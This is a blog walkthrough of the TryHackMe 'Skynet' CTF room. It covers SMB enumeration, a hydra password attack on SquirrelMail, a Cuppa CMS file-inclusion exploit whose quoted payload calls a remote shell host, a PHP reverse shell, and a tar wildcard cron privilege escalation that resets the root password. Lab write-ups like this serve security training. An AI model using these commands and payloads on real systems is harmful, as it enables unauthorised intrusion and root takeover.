narancs's blog

TryHackMe – Skynet walkthrough

TryHackMe Skynet logo

Introduction

Walkthrough for Skynet CTF room on TryHackMe. Tools used: nmap, gobuster, smbmap, hydra, CuppaCMS CVE exploit.

Enumeration

nmap scan result:

Samba (anonymous)

I used smbmap to enumerate SMB shares.

smbmap found 4 shares on the host. The share named anonymous is accessible without password, so we can take a look what files are available on it. There is another interesting share: milesdyson. However, it requires a password that we do not have yet.

Checking anonymous share:

On the share I found a file called attention.txt, and also a directory named logs including 3 files. I downloaded attention.txt and log1.txt (the other 2 log files are empty).

attention.txt:

				
					A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
				
			

log1.txt file looks like a password list, containing 31 lines with a (potential) password on each line.

So at this point, I had a username ‘milesdyson’ and a list of passwords. I used hydra to try to crack the password for ssh / imap, but it did not work. I moved on to enumerate the web server next.

HTTP

I used gobuster to enumerate directories on the web server.

Out of the 6 directories found only /squirrelmail was accessible, the other 5 directories were forbidden.

Visiting /squirrelmail page redirected me to the login page of SquirrelMail. I tried to login with incorrect credential to check the behaviour of the site.

Things I noticed:

  • The login attempt was relatively slow, it took 1-2 seconds until I received the error
  • I was redirected from /squirrelmail/src/login.php to /squirrelmail/src/redirect.php
  • The page after failed login contains the strings “ERROR” and “Unknown user or password incorrect.”

I used hydra with http-post-form module to crack the password of milesdyrus using log1.txt file as the password list. For the test condition I used ‘F=ERROR’. It means hydra will consider a password incorrect in case the string ‘ERROR’ shows up in the page after the login attempt.

Since it took 1-2 seconds until the failed login page appeared, I also had to add the -c option. Otherwise hydra returned incorrect results.

				
					  -c TIME   wait time per login attempt over all threads (enforces -t 1)

				
			

I used 2 for the value of TIME and it worked fine:

				
					hydra -l milesdyson -P log1.txt 10.10.218.122 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^:F=ERROR" -c 2
				
			

I logged in to SquirrelMail with the cracked password. There was 3 mails in the inbox. The first mail contained the password for the samba share of milesdyrus.

Samba (milesdyrus)

I accessed the share with the password found in the mail.

There was an interesting file in the notes directory called important.txt. I downloaded it using the get command.

important.txt:

				
					1. Add features to beta CMS /45************yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
				
			

HTTP round 2

I visited the beta CMS page mentioned in important.txt.

Miles Dyson personal page

The index.html page did not contain anything that would be useful, so I used gobuster again to discover sub-directories.

The /45************yd/administrator page was a login page to Cuppa CMS.

User flag

I found an exploit on Exploit DB: https://www.exploit-db.com/exploits/25971

The description of the exploit:

				
					#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
				
			

To test it, I visited the below URL:

				
					http://10.10.218.122/45************yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
				
			

And it worked.

It is also vulnerable to remote file inclusion, so I used RFI to trigger a reverse shell on the target.

  1. I downloaded PHP reverse shell from https://github.com/pentestmonkey/php-reverse-shell, then changed the IP in the script to my IP address
  2. started an HTTP server with Python to serve the file for RFI
  3. started a listener on the port specified in php-reverse-shell.php
  4. triggered the reverse shell using the RFI vulnerability

I received a shell as www-data user. I was able to read the user flag from /home/milesdyson/user.txt

Root flag

I upgraded my shell using the following commands:

				
					python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
*** press CTRL+Z to background the shell ***
stty raw -echo; fg
				
			

Then I started looking for a privilege escalation path. I found an interesting line in /etc/crontab

				
					*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
				
			

/milesdyson/backups/backup.sh script is executed every minute as root user. The content of the script:

				
					#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
				
			

Only root can edit the file, but we can exploit the tar command due to the wildcard. This vulnerability is described in the Linux PrivEsc room (Task 10 Cron Jobs – Wildcards).

What we need to do is create 2 files called ‘--checkpoint=1‘ and ‘--checkpoint-action=exec=<command>‘. Then once the tar command is executed, it will execute like this:

				
					tar cf /home/milesdyson/backups/backup.tgz --checkpoint=1 --checkpoint-action=exec=<command>
				
			

Essentially, tar will treat the files as command line options and execute whatever command we specify. This way we can execute arbitrary commands as root user. We have several options, e.g.:

  • Output the contents of /root/root.txt to a file we can read (assuming that the root flag is stored in that file)
  • Trigger a reverse shell as root user

I decided to change the password of the root user with usermod. I used the following commands to create the files for the tar wildcard exploit:

				
					echo 'usermod --password $(echo password123 | openssl passwd -1 -stdin) root' > /var/www/html/usermod.sh
touch "/var/www/html/--checkpoint-action=exec=sh usermod.sh"
touch "/var/www/html/--checkpoint=1"
chmod +x /var/www/html/usermod.sh
				
			

After waiting for 1 minute, the cron job was executed and the password of root has been changed to ‘password123’. I switched to root user and found the root flag in /root/root.txt

Summary

During the Skynet CTF room on TryHackMe, I was able to gain root access to the target exploiting several vulnerabilities.

I started by enumerating Samba. On the anonymous share I found a username and a password list. Then I used gobuster to enumerate directories on the web server and I found a login page to SquirrelMail. Using the information found, I was able to gain access to milesdyrus’ email inbox. The password for the user’s Samba share was included in an email in the inbox.

On the user’s share I found a note about a beta CMS page. Using gobuster, I was able to find the login page to Cuppa CMS. I used a file inclusion vulnerability from Exploit DB to gain initial access to the target.

Then I checked for privilege escalation paths. I found a vulnerable cron job, that I was able to exploit and gain root access to the machine.

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x